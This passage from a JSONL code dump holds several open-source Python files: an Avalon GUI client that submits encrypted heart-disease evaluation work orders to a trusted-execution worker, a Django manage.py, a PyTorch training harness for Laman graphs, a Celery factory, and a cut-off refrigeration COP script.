"py", "sha": "1a307057e4332a646673c0910d799d5bbcafe4c8", "content": "#! /usr/bin/env python3\n\n# Copyright 2019 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nHeart Evaluation GUI Client for use in submitting data to worker.\n\"\"\"\n\nimport os\nimport sys\nimport random\nimport json\nimport argparse\nimport logging\nimport secrets\n\n# Tkinter imports\nimport tkinter as tk\nimport tkinter.messagebox as messagebox\nimport tkinter.font as font\nfrom PIL import ImageTk, Image\n\n# Avalon imports\nimport crypto_utils.crypto_utility as utility\nimport avalon_sdk.worker.worker_details as worker\nfrom avalon_sdk.worker.worker_details import WorkerType\nfrom avalon_sdk.work_order.work_order_params import WorkOrderParams\nfrom avalon_sdk.direct.avalon_direct_client import AvalonDirectClient\nimport config.config as pconfig\nimport utility.logger as plogger\nimport crypto_utils.crypto.crypto as crypto\nfrom error_code.error_status import WorkOrderStatus, ReceiptCreateStatus\nimport crypto_utils.signature as signature\nfrom error_code.error_status import SignatureStatus\nfrom avalon_sdk.work_order_receipt.work_order_receipt \\\n import WorkOrderReceiptRequest\n\n# Remove duplicate loggers\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\nlogger = logging.getLogger(__name__)\n# Default TCFHOME assumes PWD is examples/apps/heart_disease_eval/client :\nTCFHOME = os.environ.get(\"TCF_HOME\", \"../../../../\")\n\n# GUI color scheme\nBACKGROUND = \"light sky blue\"\nENTRY_COLOR = \"light grey\"\nBUTTON_COLOR = \"deep sky blue\"\nRESULT_BACKGROUND = \"pale goldenrod\"\n\n\n# -----------------------------------------------------------------\ndef _generate_random_or_normal_number(normal, percent_normal, low, high):\n \"\"\"Generate number \"normal\" for \"percent_normal\" % of the time.\n Otherwise, generate a random number in the interval [\"low\", \"high\"].\n \"\"\"\n if percent_normal >= random.randint(0, 100):\n return normal\n return random.randint(low, high)\n\n\ndef _generate_random_data():\n \"\"\"Generate a random data string for input as evaluation data.\n For example: \"35 0 1 67 102 125 1 95 0 10 1 1 3 1\"\n \"\"\"\n\n age = _generate_random_or_normal_number(35, 67, 18, 100)\n sex = _generate_random_or_normal_number(0, 50, 1, 1)\n cp = _generate_random_or_normal_number(4, 67, 1, 3)\n trestbps = _generate_random_or_normal_number(67, 67, 108, 218)\n chol = _generate_random_or_normal_number(102, 67, 126, 309)\n fbs = _generate_random_or_normal_number(125, 67, 98, 248)\n restecg = _generate_random_or_normal_number(0, 67, 1, 2)\n thalach = _generate_random_or_normal_number(95, 67, 61, 198)\n exang = _generate_random_or_normal_number(0, 67, 1, 1)\n oldpeak = _generate_random_or_normal_number(10, 67, 0, 100)\n slop = _generate_random_or_normal_number(0, 67, 1, 2)\n ca = _generate_random_or_normal_number(0, 67, 1, 3)\n thaldur = _generate_random_or_normal_number(3, 67, 6, 7)\n num = _generate_random_or_normal_number(0, 67, 1, 1)\n\n return \"{} {} {} {} {} {} {} {} {} {} {} {} {} {}\".format(\n age, sex, cp, trestbps, chol, fbs, restecg, thalach,\n exang, oldpeak, slop, ca, thaldur, num)\n\n\ndef _int_validate(text):\n \"\"\"Validates that input is a non-negative integer.\"\"\"\n\n if str.isdigit(text) or text == \"\":\n return True\n else:\n return False\n\n\ndef _float_validate(text):\n \"\"\"Validates that input is a non-negative, non-special float.\"\"\"\n\n if text == \"\":\n return True\n try:\n float(text)\n if float(text) < 0.0 or float(text) == float(\"NaN\") \\\n or float(text) == float(\"INF\") \\\n or float(text) == float(\"-INF\"):\n return False\n return True\n except ValueError:\n return False\n\n\nclass intEntry:\n \"\"\"User entry for non-negative integer.\"\"\"\n\n def __init__(self, master, name):\n global cur_row\n label = tk.Label(master, text=name, background=BACKGROUND)\n label.grid(row=cur_row, column=0, sticky=\"e\", pady=(5, 0))\n validate = (master.register(_int_validate))\n self.entry = tk.Entry(\n master, validate=\"all\",\n validatecommand=(validate, \"%P\"), width=5,\n background=ENTRY_COLOR)\n self.entry.grid(\n row=cur_row, column=1, padx=(10, 0), pady=(5, 0), sticky=\"w\")\n cur_row += 1\n\n def get(self):\n # Fails if empty field\n try:\n return int(self.entry.get())\n except ValueError:\n return None\n\n def enable(self):\n self.entry.config(state=tk.NORMAL)\n\n def disable(self):\n self.entry.config(state=tk.DISABLED)\n\n\nclass floatEntry:\n \"\"\"User entry for non-negative, non-special floating point number.\"\"\"\n\n def __init__(self, master, name):\n global cur_row\n label = tk.Label(master, text=name, background=BACKGROUND)\n label.grid(row=cur_row, column=0, sticky=\"e\", pady=(5,))\n validate = (master.register(_float_validate))\n self.entry = tk.Entry(\n master, validate=\"all\",\n validatecommand=(validate, \"%P\"), width=10,\n background=ENTRY_COLOR)\n self.entry.grid(row=cur_row, column=1, padx=(10, 0), pady=(5,),\n sticky=\"w\")\n cur_row += 1\n\n def get(self):\n try:\n return float(self.entry.get())\n except ValueError:\n return None\n\n def enable(self):\n self.entry.config(state=tk.NORMAL)\n\n def disable(self):\n self.entry.config(state=tk.DISABLED)\n\n\nclass radio:\n \"\"\"User entry for a radio button.\"\"\"\n\n # Options is a list of text-value pairs\n def __init__(self, master, name, options):\n global cur_row\n if not all(len(tup) == 2 for tup in options):\n print(\"ERROR: Mismatched text-value pairs\")\n exit(1)\n\n self.var = tk.IntVar()\n self.var.set(None)\n label = tk.Label(master, text=name, background=BACKGROUND)\n label.grid(row=cur_row, column=0, pady=(5, 0), sticky=\"e\")\n\n self.button_list = []\n for i in range(len(options)):\n button = tk.Radiobutton(\n master, text=options[i][0],\n variable=self.var, value=options[i][1],\n background=BACKGROUND)\n self.button_list.append(button)\n if i == 0:\n button.grid(row=cur_row, column=1, pady=(5, 0),\n sticky=\"w\")\n else:\n button.grid(row=cur_row, column=1, sticky=\"w\")\n cur_row += 1\n\n def get(self):\n try:\n return self.var.get()\n except tk.TclError:\n return None\n\n def enable(self):\n for button in self.button_list:\n button.config(state=tk.NORMAL)\n\n def disable(self):\n for button in self.button_list:\n button.config(state=tk.DISABLED)\n\n\nclass resultWindow(tk.Toplevel):\n \"\"\"Create result window that appears after clicking \"Evaluate\".\"\"\"\n\n def __init__(self, parent, message):\n tk.Toplevel.__init__(self, parent)\n self.config(background=RESULT_BACKGROUND)\n self.parent = parent\n # Lock main window\n self.transient(parent)\n self.grab_set()\n self.initial_focus = self\n self.initial_focus.focus_set()\n self.title(\"Evaluation Result\")\n self.protocol(\"WM_DELETE_WINDOW\", self.close)\n\n # Main content\n self.main_frame = tk.Frame(self, background=RESULT_BACKGROUND)\n self.main_frame.pack()\n\n self.frame1 = tk.Frame(self.main_frame)\n self.frame1.pack(side=tk.LEFT)\n self.result_text = tk.StringVar()\n self.label = tk.Label(\n self.frame1, textvariable=self.result_text, width=45,\n background=RESULT_BACKGROUND)\n default_font = font.Font(font=\"TkDefaultFont\")\n new_font = default_font\n new_font.config(weight=font.BOLD)\n self.label.config(font=new_font)\n self.label.pack()\n\n # JSON window display sidebar buttons\n self.frame2 = tk.Frame(self.main_frame, background=RESULT_BACKGROUND)\n self.frame2.pack(side=tk.LEFT)\n\n self.frame2 = tk.Frame(\n self.frame2, background=RESULT_BACKGROUND)\n self.frame2.pack(side=tk.LEFT)\n\n self.request_button = tk.Button(\n self.frame2, text=\"View Request\", command=self.request,\n background=BUTTON_COLOR)\n self.request_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))\n\n self.result_button = tk.Button(\n self.frame2, text=\"View Result\", command=self.result,\n background=BUTTON_COLOR)\n self.result_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))\n\n self.receipt_button = tk.Button(\n self.frame2, text=\"View Receipt\",\n command=self.receipt, background=BUTTON_COLOR)\n self.receipt_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))\n\n # Close button\n self.close_button = tk.Button(\n self, text=\"Close\",\n command=self.close, background=BUTTON_COLOR)\n self.close_button.pack(pady=(0, 5))\n\n self.evaluate(message)\n\n def evaluate(self, message):\n \"\"\"Create and submit workorder and wait for result.\"\"\"\n\n self.result_text.set(\"Waiting for evaluation result...\")\n self.update()\n\n # Create, sign, and submit workorder.\n # Convert workloadId to hex.\n workload_id = \"heart-disease-eval\"\n workload_id = workload_id.encode(\"UTF-8\").hex()\n session_iv = utility.generate_iv()\n session_key = utility.generate_key()\n requester_nonce = secrets.token_hex(16)\n work_order_id = secrets.token_hex(32)\n requester_id = secrets.token_hex(32)\n wo_params = WorkOrderParams(\n work_order_id, worker_id, workload_id, requester_id,\n session_key, session_iv, requester_nonce,\n result_uri=\" \", notify_uri=\" \",\n worker_encryption_key=worker_obj.encryption_key,\n data_encryption_algorithm=\"AES-GCM-256\"\n )\n wo_params.add_in_data(message)\n\n wo_params.add_encrypted_request_hash()\n\n private_key = utility.generate_signing_keys()\n if requester_signature:\n # Add requester signature and requester verifying_key\n if wo_params.add_requester_signature(private_key) is False:\n logger.info(\"Work order request signing failed\")\n exit(1)\n\n # Set text for JSON sidebar\n req_id = 51\n self.request_json = wo_params.to_jrpc_string(req_id)\n\n work_order_instance = direct_jrpc.get_work_order_instance()\n response = work_order_instance.work_order_submit(\n wo_params.get_work_order_id(),\n wo_params.get_worker_id(),\n wo_params.get_requester_id(),\n wo_params.to_string(),\n id=req_id\n )\n logger.info(\"Work order submit response : {}\\n \".format(\n json.dumps(response, indent=4)\n ))\n if \"error\" in response and response[\"error\"][\"code\"] != \\\n WorkOrderStatus.PENDING:\n sys.exit(1)\n # Create work order receipt\n req_id += 1\n wo_receipt_instance = direct_jrpc.get_work_order_receipt_instance()\n wo_request = json.loads(self.request_json)\n wo_receipt_obj = WorkOrderReceiptRequest()\n wo_create_receipt = wo_receipt_obj.create_receipt(\n wo_request,\n ReceiptCreateStatus.PENDING.value,\n private_key\n )\n logger.info(\"Work order create receipt request : {} \\n \\n \".format(\n json.dumps(wo_create_receipt, indent=4)\n ))\n # Submit work order create receipt jrpc request\n wo_receipt_resp = wo_receipt_instance.work_order_receipt_create(\n wo_create_receipt[\"workOrderId\"],\n wo_create_receipt[\"workerServiceId\"],\n wo_create_receipt[\"workerId\"],\n wo_create_receipt[\"requesterId\"],\n wo_create_receipt[\"receiptCreateStatus\"],\n wo_create_receipt[\"workOrderRequestHash\"],\n wo_create_receipt[\"requesterGeneratedNonce\"],\n wo_create_receipt[\"requesterSignature\"],\n wo_create_receipt[\"signatureRules\"],\n wo_create_receipt[\"receiptVerificationKey\"],\n req_id\n )\n\n logger.info(\"Work order create receipt response : {} \\n \\n \".format(\n wo_receipt_resp\n ))\n\n # Retrieve result and set GUI result text\n res = work_order_instance.work_order_get_result(\n work_order_id,\n req_id\n )\n self.result_json = json.dumps(res, indent=4)\n if \"result\" in res:\n sig_obj = signature.ClientSignature()\n status = sig_obj.verify_signature(\n res, worker_obj.verification_key)\n try:\n if status == SignatureStatus.PASSED:\n logger.info(\"Signature verification Successful\")\n decrypted_res = utility. \\\n decrypted_response(res, session_key, session_iv)\n logger.info(\"\\n\" +\n \"Decrypted response:\\n {}\".\n format(decrypted_res))\n else:\n logger.info(\"Signature verification Failed\")\n sys.exit(1)\n except Exception as err:\n logger.info(\"ERROR: Failed to decrypt response: %s\", str(err))\n sys.exit(1)\n else:\n logger.info(\"\\n Work order get result failed {}\\n\".format(res))\n sys.exit(1)\n\n # Set text for JSON sidebar\n self.result_text.set(\n decrypted_res[0][\"data\"])\n\n # Retrieve receipt\n # Set text for JSON sidebar\n req_id += 1\n self.receipt_json = json.dumps(\n wo_receipt_instance.work_order_receipt_retrieve(\n work_order_id,\n req_id\n ),\n indent=4\n )\n\n def request(self):\n jsonWindow(self, self.request_json, \"Request JSON\")\n\n def result(self):\n jsonWindow(self, self.result_json, \"Result JSON\")\n\n def receipt(self):\n jsonWindow(self, self.receipt_json, \"Receipt JSON\")\n\n def close(self):\n self.parent.focus_set()\n self.destroy()\n\n\nclass jsonWindow(tk.Toplevel):\n \"\"\"Template for JSON display\n (from clicking View Request/Result/Receipt buttons).\n \"\"\"\n\n def __init__(self, parent, json, title):\n tk.Toplevel.__init__(self, parent)\n self.title(title)\n self.scrollbar = tk.Scrollbar(self)\n self.scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n\n self.text = tk.Text(self, yscrollcommand=self.scrollbar.set)\n self.text.insert(tk.END, json)\n self.text.config(state=tk.DISABLED)\n self.text.pack(expand=True, fill=\"both\")\n\n self.scrollbar.config(command=self.text.yview)\n\n\ndef gui_main():\n \"\"\"Create main Tkinter window and \"Evaluate\" event handler.\"\"\"\n\n root = tk.Tk()\n root.title(\"Heart Disease Evaluation\")\n root.config(background=BACKGROUND)\n\n # Display image\n imageFile = TCFHOME + \\\n \"/examples/apps/heart_disease_eval/images/ecg.jpg\"\n img = ImageTk.PhotoImage(Image.open(imageFile))\n canvas = tk.Canvas(root, width=290, height=220, background=BACKGROUND)\n canvas.pack()\n canvas.create_image(20, 20, anchor=tk.NW, image=img)\n\n # Setup left and right frames for data entry\n var_root = tk.Frame(root, background=BACKGROUND)\n var_root.pack(pady=(10, 0))\n v_frame1 = tk.Frame(var_root, background=BACKGROUND)\n v_frame1.pack(fill=tk.Y, side=tk.LEFT, padx=(10, 0))\n v_frame2 = tk.Frame(var_root, background=BACKGROUND)\n v_frame2.pack(fill=tk.Y, side=tk.LEFT, padx=(0, 10))\n # Organizes parameter grid\n global cur_row\n cur_row = 0\n\n # Parameter grid\n age = intEntry(v_frame1, \"Age\")\n sex = radio(v_frame1, \"Sex\", [(\"Male\", 1), (\"Female\", 0)])\n cp = radio(v_frame1, \"Chest pain type\", [(\"Typical angina\", 1),\n (\"Atypical angina\", 2), (\"Non-anginal pain\", 3),\n (\"Asymptomatic\", 4)])\n trestbps = intEntry(v_frame1, \"Resting blood pressure\\n (mm Hg)\")\n chol = intEntry(v_frame1, \"Serum cholesterol (mg/dl)\")\n fbs = intEntry(v_frame1, \"Fasting blood sugar (mg/dl)\")\n restecg = radio(v_frame1, \"Electrocardiographic\\n resting results\",\n [(\"Normal\", 0), (\"ST-T wave abnormality\", 1),\n (\"Showing hypertrophy\", 2)])\n thalach = intEntry(v_frame1, \"Maximum heart rate\")\n exang = radio(v_frame2, \"Exercise induced angina\",\n [(\"Yes\", 1), (\"No\", 0)])\n oldpeak = floatEntry(\n v_frame2, \"ST depression induced by\\n exercise relative to rest\")\n slope = radio(v_frame2, \"Slope of the peak\\n exercise ST segment\",\n [(\"Upsloping\", 0), (\"Flat\", 1), (\"Downsloping\", 2)])\n ca = radio(v_frame2, \"Major vessels colored\\n by flouroscopy\",\n [(\"0\", 0), (\"1\", 1), (\"2\", 2), (\"3\", 3)])\n thal = radio(\n v_frame2,\n \"Thallium stress test\",\n [(\"Normal\", 3), (\"Fixed defect\", 6), (\"Reversible defect\", 7)])\n num = radio(v_frame2, \"Heart disease diagnosis\",\n [(\"<50% diameter narrowing\", 0),\n (\">50% diameter narrowing\", 1)])\n var_list = [age, sex, cp, trestbps, chol, fbs, restecg, thalach,\n exang, oldpeak, slope, ca, thal, num]\n\n def string_toggle():\n \"\"\"Disable/enable other variable entries/buttons based on\n whether string input option is selected.\n \"\"\"\n\n if string_use.get() == 1 or random_use.get() == 1:\n for var in var_list:\n var.disable()\n string_entry.config(state=tk.NORMAL)\n else:\n for var in var_list:\n var.enable()\n string_entry.config(state=tk.DISABLED)\n\n # Input vars as string option with a check button to enable\n random_frame = tk.Frame(root, background=ENTRY_COLOR)\n random_frame.pack()\n\n # Option to generate random data entry\n random_use = tk.IntVar()\n random_check = tk.Checkbutton(\n random_frame, command=string_toggle, variable=random_use,\n background=BACKGROUND)\n random_check.pack(side=tk.LEFT)\n random_label = tk.Label(\n random_frame,\n text=\"Generate random data \",\n background=BACKGROUND)\n random_label.pack(side=tk.LEFT)\n\n # Option to enter data as space-separated string entries\n string_frame = tk.Frame(root, background=ENTRY_COLOR)\n string_frame.pack()\n string_use = tk.IntVar()\n string_check = tk.Checkbutton(\n string_frame, command=string_toggle, variable=string_use,\n background=BACKGROUND)\n string_check.pack(side=tk.LEFT)\n string_label = tk.Label(\n string_frame,\n text=\"Input variables as a string\",\n background=BACKGROUND)\n string_label.pack(side=tk.LEFT)\n string_entry = tk.Entry(\n string_frame, state=tk.DISABLED, width=50,\n background=ENTRY_COLOR)\n string_entry.pack(side=tk.LEFT)\n\n def evaluate():\n \"\"\"Open window that will submit work order and retrieve\n an evaluation result.\n \"\"\"\n\n message = \"Heart disease evaluation data: \"\n if string_use.get() == 1: # input is space-separated numbers\n input_data = string_entry.get()\n if input_data is None or len(input_data) == 0:\n messagebox.showwarning(\n \"Error\", \"Must input space-separated variables\")\n return\n message = message + input_data\n\n elif random_use.get() == 1:\n input_data = _generate_random_data()\n if input_data is None or len(input_data) == 0:\n messagebox.showwarning(\n \"Error\", \"Random variable generation error\")\n return\n message = message + input_data\n else:\n for var in var_list:\n if var.get() is None:\n messagebox.showwarning(\"Error\", \"Must input all variables\")\n return\n message = message + str(var.get()) + \" \"\n root.wait_window(resultWindow(root, message))\n\n def aggregate():\n \"\"\"Open window that will submit work order to retrieve\n an aggregate result.\n \"\"\"\n\n message = \"Heart disease aggregate data: \"\n root.wait_window(resultWindow(root, message))\n\n # \"Evaluate\" button\n eval_text = tk.StringVar()\n eval_label = tk.Label(root, textvariable=eval_text,\n background=BACKGROUND)\n eval_label.pack()\n eval_button = tk.Button(root, text=\"Evaluate\", command=evaluate,\n background=BUTTON_COLOR)\n eval_button.pack()\n\n # \"Aggregate\" button\n aggr_text = tk.StringVar()\n aggr_label = tk.Label(root, textvariable=aggr_text, background=BACKGROUND)\n aggr_label.pack()\n aggr_button = tk.Button(root, text=\"Aggregate all data\",\n command=aggregate, background=BUTTON_COLOR)\n aggr_button.pack(pady=(0, 10))\n\n root.mainloop()\n\n\ndef parse_command_line(args):\n \"\"\"Setup and parse command line arguments and help information.\"\"\"\n\n global worker_obj\n global worker_id\n global verbose\n global config\n global off_chain\n global requester_signature\n\n parser = argparse.ArgumentParser()\n use_service = parser.add_mutually_exclusive_group()\n parser.add_argument(\n \"-c\", \"--config\",\n help=\"the config file containing the\" +\n \" Ethereum contract information\", type=str)\n use_service.add_argument(\n \"-r\", \"--registry-list\",\n help=\"the Ethereum address of the registry list\",\n type=str)\n use_service.add_argument(\n \"-s\", \"--service-uri\",\n help=\"skip URI lookup and send to specified URI\",\n type=str)\n use_service.add_argument(\n \"-o\", \"--off-chain\",\n help=\"skip URI lookup and use the registry in the config file\",\n action=\"store_true\")\n parser.add_argument(\n \"-w\", \"--worker-id\",\n help=\"skip worker lookup and retrieve specified worker\",\n type=str)\n parser.add_argument(\n \"-v\", \"--verbose\",\n help=\"increase output verbosity\",\n action=\"store_true\")\n parser.add_argument(\n \"-rs\", \"--requester_signature\",\n help=\"Enable requester signature for work order requests\",\n action=\"store_true\")\n\n options = parser.parse_args(args)\n\n if options.config:\n conf_files = [options.config]\n else:\n conf_files = [TCFHOME +\n \"/sdk/avalon_sdk/tcf_connector.toml\"]\n conf_paths = [\".\"]\n\n try:\n config = pconfig.parse_configuration_files(conf_files, conf_paths)\n json.dumps(config, indent=4)\n except pconfig.ConfigurationException as e:\n logger.error(str(e))\n sys.exit(-1)\n\n global direct_jrpc\n direct_jrpc = AvalonDirectClient(conf_files[0])\n\n # Whether or not to connect to the registry list on the blockchain\n off_chain = False\n\n if options.registry_list:\n config[\"ethereum\"][\"direct_registry_contract_address\"] = \\\n options.registry_list\n\n if options.service_uri:\n service_uri = options.service_uri\n off_chain = True\n\n if options.off_chain:\n service_uri = config[\"tcf\"].get(\"json_rpc_uri\")\n off_chain = True\n\n requester_signature = options.requester_signature\n\n verbose = options.verbose\n worker_id = options.worker_id\n\n # Initializing Worker Object\n worker_obj = worker.SGXWorkerDetails()\n\n\ndef initialize_logging(config):\n \"\"\"Initialize logging.\"\"\"\n\n if verbose:\n config[\"Logging\"] = {\n \"LogFile\": \"__screen__\",\n \"LogLevel\": \"INFO\"\n }\n else:\n config[\"Logging\"] = {\n \"LogFile\": \"__screen__\",\n \"LogLevel\": \"WARN\"\n }\n plogger.setup_loggers(config.get(\"Logging\", {}))\n sys.stdout = plogger.stream_to_logger(\n logging.getLogger(\"STDOUT\"), logging.DEBUG)\n sys.stderr = plogger.stream_to_logger(\n logging.getLogger(\"STDERR\"), logging.WARN)\n\n\ndef initialize_tcf(config):\n \"\"\"Initialize Avalon: get Avalon worker instance.\"\"\"\n\n logger.info(\"***************** Avalon *****************\")\n\n # Retrieve Worker Registry\n if not off_chain:\n registry_list_instance = direct_jrpc. \\\n get_worker_registry_list_instance()\n registry_count, lookup_tag, registry_list = \\\n registry_list_instance.registry_lookup()\n logger.info(\"\\n Registry lookup response : registry count {}\\\n lookup tag {} registry list {}\\n\".format(\n registry_count, lookup_tag, registry_list\n ))\n if (registry_count == 0):\n logger.warn(\"No registries found\")\n sys.exit(1)\n registry_retrieve_result = \\\n registry_list_instance.registry_retrieve(\n registry_list[0])\n logger.info(\"\\n Registry retrieve response : {}\\n\".format(\n registry_retrieve_result\n ))\n config[\"tcf\"][\"json_rpc_uri\"] = registry_retrieve_result[0]\n\n # Prepare worker\n\n global worker_id\n if not worker_id:\n worker_registry_instance = direct_jrpc.get_worker_registry_instance()\n req_id = 31\n worker_lookup_result = worker_registry_instance.worker_lookup(\n worker_type=WorkerType.TEE_SGX,\n id=req_id\n )\n logger.info(\"\\n Worker lookup response : {} \\n\".format(\n json.dumps(worker_lookup_result, indent=4)\n ))\n if \"result\" in worker_lookup_result and \\\n \"ids\" in worker_lookup_result[\"result\"].keys():\n if worker_lookup_result[\"result\"][\"totalCount\"] != 0:\n worker_id = \\\n worker_lookup_result[\"result\"][\"ids\"][0]\n else:\n logger.error(\"ERROR: No workers found\")\n sys.exit(1)\n else:\n logger.error(\"ERROR: Failed to lookup worker\")\n sys.exit(1)\n req_id += 1\n worker = worker_registry_instance.worker_retrieve(\n worker_id,\n req_id\n )\n logger.info(\"\\n Worker retrieve response : {}\\n\".format(\n json.dumps(worker, indent=4)\n ))\n worker_obj.load_worker(\n worker\n )\n logger.info(\"**********Worker details Updated with Worker ID\" +\n \"*********\\n%s\\n\", worker_id)\n\n\ndef main(args=None):\n \"\"\"Entry point function.\"\"\"\n\n parse_command_line(args)\n\n initialize_logging(config)\n\n initialize_tcf(config)\n\n # Open GUI\n gui_main()\n\n\n# -----------------------------------------------------------------------------\nmain()\n"} {"ext": "py", "sha": "1a307088777aa0e35f95b844b6e96a4fe7c6fc1e", "content": "#!/usr/bin/env python\n# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\nimport sys\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"myoauth.settings\")\n\n from django.core.management import execute_from_command_line\n\n execute_from_command_line(sys.argv)\n"} {"ext": "py", "sha": "1a30713242f679d0cf9a3f0fa4790f66a85e40ac", "content": "import numpy as np\nimport collections\nimport numbers\nimport torch\nimport os\nfrom . import joint_network\nfrom .summary import LamanClassificationSummary\nfrom .. import corruption_dataset, model as mo\nfrom .representation import graph_to_rep, combine_graph_reps, encode_action, LamanRep, get_action_offsets\nfrom ..molecule_models import _train_utils, _train_harness\nfrom ._utils import cast_numpy_rec\n\n\ndef _transform(graph, act):\n graph_rep = graph_to_rep(graph)\n act_encoded = encode_action(act, graph)\n act_coarse = act.action_type\n offset = torch.from_numpy(get_action_offsets(graph)).int()\n\n return {\n 'graph': graph_rep,\n 'label': act_encoded,\n 'label_coarse': act_coarse,\n 'label_offset': offset\n }\n\n\ndef _collate(batch):\n graph = combine_graph_reps([b['graph'] for b in batch])\n graph = cast_numpy_rec(graph)\n label_fine = torch.LongTensor([b['label'] for b in batch])\n label_coarse = torch.LongTensor([b['label_coarse'] for b in batch])\n offsets = torch.stack([b['label_offset'] for b in batch])\n\n return {'graph': graph, 'label': label_fine, 'label_coarse': label_coarse, 'label_offset': offsets}\n\n\ndef make_dataloader(dataset, batch_size=128, num_workers=2):\n return torch.utils.data.DataLoader(\n dataset, batch_size, shuffle=True, collate_fn=_collate,\n pin_memory=True, num_workers=num_workers)\n\n\nclass LamanJointHarness(_train_harness.TrainingHarness):\n _keys = ['label', 'label_offset']\n\n def __init__(self, model, optimizer, summary, task='train', profile=False):\n super(LamanJointHarness, self).__init__(model, optimizer, summary, task=task, profile=profile)\n\n def get_model_input(self, batch):\n graph = LamanRep.from_sequence(batch['graph'])\n return graph,\n\n def get_loss(self, model_output, batch):\n loss, summary_info = mo.classification.multi_classification_coarse_to_fine_loss(\n model_output, batch['label_coarse'], batch['label'], summary_info=True)\n\n self.summary.record_marginal_probability(\n torch.nn.functional.softmax(summary_info['coarse_logit'].detach(), dim=1).mean(dim=0))\n\n return loss\n\n def record_step_summary(self, batch, model_output):\n logits_and_scopes = model_output\n prediction, label, label_offset = _train_harness.compute_and_aggregate_predictions(\n logits_and_scopes, batch, self._keys)\n\n if self.summary:\n self.summary.record_statistics(prediction, label, label_offset)\n\n\ndef main(parameters=None):\n if parameters is None:\n parameters = {}\n\n task = parameters.get('task', 'train')\n batch_size = parameters.get('batch_size', 256)\n\n dataset_path = parameters.get('dataset_path')\n if dataset_path is None:\n dataset_path = '../data/laman/low_decomp_dataset_sample.pkl'\n\n dataset = corruption_dataset.LamanCorruptionDataset(dataset_path, transform=_transform)\n\n dataloader = make_dataloader(dataset, batch_size, num_workers=parameters.get('num_workers', 2))\n\n config = joint_network.JointClassificationNetworkConfig(\n 5, message_size=256)\n model = joint_network.JointClassificationNetwork(config)\n\n if 'model_path' in parameters and parameters['model_path'] is not None:\n model.load_state_dict(torch.load(parameters['model_path'], map_location='cpu'))\n\n model = model.cuda()\n\n if task != 'train':\n model = model.eval()\n\n if task == 'train':\n optimizer, schedulers = _train_utils.init_optimizer(model, parameters)\n else:\n optimizer = None\n schedulers = []\n\n summary = LamanClassificationSummary()\n\n harness = LamanJointHarness(model, optimizer, summary, task)\n harness.hooks.extend([\n _train_harness.LogLossTimeHook(batch_size),\n _train_harness.PrintAccuracyHook(summary, None)\n ])\n\n savedir = _train_utils.get_save_dir(parameters)\n\n for epoch in range(30):\n dataset.set_epoch(epoch)\n harness.set_epoch(epoch)\n\n if task == 'train':\n for scheduler in schedulers:\n scheduler.step()\n\n harness.train_epoch(dataloader)\n\n if task == 'train':\n torch.save(\n model.state_dict(),\n os.path.join(savedir, 'laman_joint_ep_{0}.pth'.format(epoch)))\n\n\nif __name__ == '__main__':\n args = _train_utils.parse_arguments()\n main(vars(args))\n"} {"ext": "py", "sha": "1a30713db64a02d79f6d119907494d1b00e0c519", "content": "from celery import Celery\n\n\ndef make_celery(app):\n celery = Celery(\n app.import_name,\n broker=app.config.get('CELERY_BROKER_URL', 'redis://localhost:6379')\n )\n celery.conf.update(app.config)\n TaskBase = celery.Task\n\n class ContextTask(TaskBase):\n abstract = True\n\n def __call__(self, *args, **kwargs):\n with app.app_context():\n return TaskBase.__call__(self, *args, **kwargs)\n\n celery.Task = ContextTask\n return celery\n"} {"ext": "py", "sha": "1a3071793dfa4b9b377970acbccf3fd7b1f75ffd", "content": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sympy import solve, Eq, symbols\nimport sys \nimport pandas\nimport math\nimport os\n\ndef degradeCOP(Tevap, Tcond, Qall, S):\n degraded = ((Tevap * Tcond)/(Tcond - Tevap)) * (S/Qall)\n return degraded\n\n# This function calculates the reversible COP of a ES refrigerator based on thermal reservoirs\ndef reversibleCOP(Tevap, Tcond, Tgen):\n revCOP = (((Tgen - Tcond)/(Tgen))/((Tcond-Tevap)/Tevap))\n return revCOP\n\n# This function solves the system of equations to calculate the mass flowrates of\n# the combined absorber-evaporator system\ndef massabsorberevaporator(m6, m4, xa4, ya3, xa6):\n m3, m5= symbols(['m3', 'm5'])\n system = [\n #Eq((xa4*m4)+ (ya3 * m3) - (0 * m5) - (xa6 * m6), 0),\n Eq(m5 - (1-ya3)*m3,0),\n Eq(m4 + m3 - m5 - m6, 0),\n #Eq((1-ya3)*m3-m5, 0)\n #Eq(m4 - (ya3*m3) - (m5) + (ya3 * m6), 0)\n ]\n soln = solve(system, [m4, m3, m5, m6])\n\n return float(m4), float(soln[m3]), float(soln[m5]), float(m6)\n\n# This is an interpolate helper function to be used in other functions.\n# targetcomp refers to ammonia composition. All CSV files are in ammonia composition.\ndef interpolateAW(targetcomp, T, var):\n # must use the entropy-ammonia-water csv, entropy-ammonia-butane csv, or enthalpy-ammonia-water csv\n\n script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\n rel_path = 'data/mixed/'\n abs_file_path = os.path.join(script_dir, rel_path)\n\n colnames = ['pressure', 'ammoniacomp', 'prop']\n propertyname = ''\n if var is 1:\n propertyname = 'enthalpy'\n else:\n propertyname = 'entropy'\n\n filename = propertyname + '-kjmol-' + str(T) + 'K-ammoniawater'\n\n data = pandas.read_csv(str(abs_file_path) + '%s.csv' %filename, names=colnames)\n\n ammoniacomp = data.ammoniacomp.tolist()\n prop = 